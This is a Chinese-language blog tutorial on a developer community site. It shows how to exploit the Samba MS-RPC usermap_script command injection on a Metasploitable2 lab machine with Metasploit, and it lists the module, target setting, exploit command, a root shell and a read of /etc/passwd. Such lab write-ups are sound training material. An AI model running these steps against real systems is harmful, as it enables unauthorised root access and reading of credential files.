AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

Samba MS-RPC Shell命令注入漏洞

2022-12-13 211
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 靶场环境:metasploitable2靶机地址:192.168.0.109攻击机地址:192.168.0.114首先打开kali,启动msf框架

靶场环境:metasploitable2

靶机地址:192.168.0.109

攻击机地址:192.168.0.114

首先打开kali,启动msf框架

sudo msfdb run

image.png搜索漏洞模块

image.png

选择要利用的模块:

use exploit/multi/samba/usermap_script

image.png

查看所需要设置的参数

show options

我们看到只需要设置RHOSTS(靶机地址)

set rhosts 192.168.0.109

image.png

开始攻击

exploit

image.png

攻击成功

试着执行一下ls命令

image.png

执行成功

whoami查看当前权限为root

image.png

查看靶机ip 

ip a

image.png

查看敏感文件

cat /etc/passwd

image.png

ctrl+c退出

文章标签:
Shell
安全
关键词:
Shell命令
RPC注入
RPC漏洞
Shell命令注入漏洞
Shell漏洞
郝奕程
目录
相关文章
米果粒
|
15天前
|
分布式计算 Hadoop Shell
使用Shell命令操作HDFS
【8月更文挑战第5天】使用Shell命令操作HDFS。
米果粒
33 5
kaixin321-44007
|
1月前
|
存储 Shell 分布式数据库
Hbase 的基本shell 命令
Hbase 的基本shell 命令
kaixin321-44007
34 8
花酒锄作田
|
12天前
|
Shell Linux
shell命令-lsof
shell命令-lsof
花酒锄作田
24 0
香吧香
|
23天前
|
Shell Linux Perl
shell 编程中 awk ,wc ,$0,$1 等 命令的使用总结
shell 编程中 awk ,wc ,$0,$1 等 命令的使用总结
香吧香
20 0
嘟嘟嘟嘟嘟嘟
|
1月前
|
敏捷开发 Shell 测试技术
阿里云云效产品使用合集之如何用私有构建机运行shell命令打出的镜像作为下一个阶段的入参
云效作为一款全面覆盖研发全生命周期管理的云端效能平台,致力于帮助企业实现高效协同、敏捷研发和持续交付。本合集收集整理了用户在使用云效过程中遇到的常见问题,问题涉及项目创建与管理、需求规划与迭代、代码托管与版本控制、自动化测试、持续集成与发布等方面。
嘟嘟嘟嘟嘟嘟
84 0
左诗右码
|
2月前
|
存储 Shell 数据安全/隐私保护
Shell 内建命令:Shell 的内在魔力
Shell 内建命令比外部命令执行快,不需额外进程。`type` 命令用来检查命令类型。内建命令如 `cd`、`alias` 和 `echo` 直接在 Shell 中执行,不涉及磁盘 I/O。`type` 示例展示了 `cd` 是内建的,`ifconfig` 是外部的。`bash` 包含多种内建命令,如 `cd` 用于切换目录,`alias` 定义别名,`read` 从输入读取数据。`echo` 默认加换行,`echo -n` 可避免。
左诗右码
35 5
小竹笋
|
2月前
|
Shell 虚拟化
分布式系统详解--框架(Zookeeper-基本shell命令)
分布式系统详解--框架(Zookeeper-基本shell命令)
小竹笋
33 1
听风的鱼鱼儿
|
2月前
|
安全 Shell Linux
探索Linux命令chsh:更改用户的默认shell
`chsh`是Linux命令,用于更改用户的默认登录shell。它涉及用户环境配置和系统安全,允许用户选择更适合自己的shell以提升效率。命令有交互式选项和参数如`-s`来指定新shell。在使用时要注意新shell的可执行性、权限问题及选择合适的shell。例如,要更改为bash,用户可运行`chsh`后按提示操作,而root用户能用`sudo chsh -s /bin/zsh john`为用户`john`设定zsh。在更改前,确认shell路径、权限,并了解不同shell的特点。
听风的鱼鱼儿
101 3
小竹笋
|
2月前
|
分布式计算 Hadoop Shell
分布式系统详解--框架(Hadoop-基本shell命令)
分布式系统详解--框架(Hadoop-基本shell命令)
小竹笋
23 0
左诗右码
|
2月前
|
Shell
Shell [[]] 命令:条件判断的升级版
`[[ ]]` 是 Bash 中增强型的条件判断命令,提供比 `[ ]` 更多的灵活性,如无需引号包裹变量、直接字符串比较及正则支持。例如: ```markdown - 不加引号比较:`[[ -z $str1 ]]` - 逻辑运算:`[[ -z $str1 ]] || [[ -z $str2 ]]` - 正则匹配:`[[ $phone =~ ^1[0-9]{10}$ ]]` ``` 它不支持 `-a` 和 `-o`,但能用 `&&` 和 `||` 进行逻辑操作。用于复杂字符串验证和文件处理时非常有用。
左诗右码
27 0